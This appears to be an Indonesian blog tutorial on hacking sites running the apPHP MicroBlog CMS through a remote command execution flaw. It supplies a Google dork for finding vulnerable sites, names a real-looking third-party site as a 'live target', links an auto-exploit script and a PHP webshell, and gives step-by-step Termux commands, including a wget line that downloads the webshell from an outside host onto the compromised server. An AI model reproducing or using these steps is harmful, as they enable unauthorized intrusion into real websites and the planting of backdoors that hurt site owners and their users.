-
Hai sobat
Saya ikal,
Disini saya akan sharing - sharing sesuatu nih.
-
Sesuai judul kita kali ini, kita akan membahas sebuah exploit yang terdapat di sebuah CMS bernama apPHP MicroBlog. Exploit nya sendiri ada banyak :D, namun kita ambil yang ez for upload shell saja, salah satunya adalah Remote Command Execution (RCE).
Okeh kita langsung masuk saja kedalam inti pembahasan ini/Tahap Exploitasi.
Bahan :
- Google Dork : "ApPHP" + "Admin Login"
- Webshell : https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php
- Tools auto exploit : https://www.exploit-db.com/download/33070
- Termux/Terminal lainnya
Pertama tama kalian cari target dulu untuk di eksekusi, disini saya sudah punya live target yah, jadi saya cantumkan saja.
Live target :
http://www.richcrail.com/blog/index.php
Nah itu live target saya :D, Pertama tama kita download dulu tools auto exploit nya dengan mengklik saja link yang di cantumkan di atas, maka file otomatis akan terdownload kedalam device kalian.
Lanjut kita buka termux dan ketikan syntax berikut :
$ cd /sdcard && cd Download
Lalu kita install python2 untuk menjalankan toolsnya. Ketikan syntax ini ke termux kalian :
$ pkg install python2 -y
Nah, sekarang kita tinggal jalankan tools nya dengan ketikan syntax berikut ke termux kalian :
$ python2 33070.py https://localhost/index.php
Atau
$ python2 33070.py https://localhost/[path]/index.php
*Note : Ganti url localhost dengan target kalian masing - masing, beserta file /index.php
Contoh :
$ python2 33070.py http://www.richcrail.com/blog/index.php
Tampilan exploitasi berhasil |
Jika vuln Remote Command Execution, maka akan muncul kata ini
[*] Testing remote execution
[+] Remote exec is working with system() :)
Submit your commands, type exit to quit
>
Nah, jika tidak muncul > nya. Cari target lain saja :D.
Selepas itu kita tinggal melakukan wget untuk mengupload shell, pasti udh tau dong command wget gimana :D.
wget https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php -O 0x33070.php
Dan kalian tinggal mengakses webshellnya dengan nama 0x33070.php. Contoh :
https://localhost/0x33070.php
https://localhost/[path]/0x33070.php
Nah segini saja artikel kali ini, Jika ada yang kurang atau salah kata biarkan saja.
Thanks
See U